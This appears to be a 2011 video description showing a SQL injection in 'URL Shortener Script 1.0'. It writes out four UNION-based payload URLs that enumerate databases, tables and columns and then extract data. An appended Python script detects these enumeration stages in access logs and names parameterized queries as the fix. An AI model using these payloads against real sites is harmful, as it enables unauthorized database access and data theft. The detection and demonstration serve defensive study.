OWASP Mantra - URL Shortener Script SQL Injection Vulnerability

Published on Oct 25, 2011

OWASP Mantra
http://www.getmantra.com/

URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17...

SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-inject...
http://ha.ckers.org/sqlinjection/

How to: Create a simple URL shortener script in a few minutes
http://djpate.com/2009/08/09/how-to-c...

Exploit-DB URL: http://www.exploit-db.com/exploits/17...

Getting Databases: http://www.service.com/shortURL/show.... union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.... union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.... union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.... union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --
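The four stages listed above (databases, tables, columns, data) leave a recognisable trail in web server access logs. The following Python detector is an added example, not part of the video or its description; the log lines, the `/app/lookup` path and the `key` parameter are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines; path and "key" parameter are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Oct/2011:10:00:00 +0000] "GET /app/lookup?key=abc12 HTTP/1.1" 200 311',
    '198.51.100.7 - - [25/Oct/2011:10:00:02 +0000] "GET /app/lookup?key=credit-union-select HTTP/1.1" 404 90',
    '203.0.113.9 - - [25/Oct/2011:10:01:00 +0000] "GET /app/lookup?key=1+union+all+select+(select+schema_name+from+information_schema.schemata+limit+0,1)-- HTTP/1.1" 200 402',
    '203.0.113.9 - - [25/Oct/2011:10:01:05 +0000] "GET /app/lookup?key=1%20UNION%20ALL%20SELECT%20(select%20group_concat(table_name)%20from%20information_schema.tables)-- HTTP/1.1" 200 655',
    '203.0.113.9 - - [25/Oct/2011:10:01:09 +0000] "GET /app/lookup?key=1+union/**/select+(select+group_concat(column_name)+from+information_schema.columns)-- HTTP/1.1" 200 640',
    '203.0.113.9 - - [25/Oct/2011:10:01:14 +0000] "GET /app/lookup?key=1+union+all+select+(select+concat(col)+from+db.tbl+limit+0,1)-- HTTP/1.1" 200 380',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
STAGES = [  # information_schema view queried -> enumeration stage
    ("database enumeration", re.compile(r"information_schema\s*\.\s*schemata", re.I)),
    ("table enumeration", re.compile(r"information_schema\s*\.\s*tables", re.I)),
    ("column enumeration", re.compile(r"information_schema\s*\.\s*columns", re.I)),
]

def normalize(query):
    """Undo (possibly repeated) URL-encoding, drop /* */ comments, collapse spaces."""
    prev = None
    while prev != query:
        prev, query = query, unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query)

def classify(line):
    """Return (client, stage) for a UNION-based injection request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    query = normalize(urlsplit(target).query)
    if not UNION_SELECT.search(query):
        return None
    for stage, pattern in STAGES:
        if pattern.search(query):
            return client, stage
    # UNION SELECT without information_schema: reading application tables
    return client, "data extraction"

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]
```

Seeing the stages appear in sequence from one client is a stronger signal than any single hit, and the durable fix remains a parameterized query in the lookup script.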
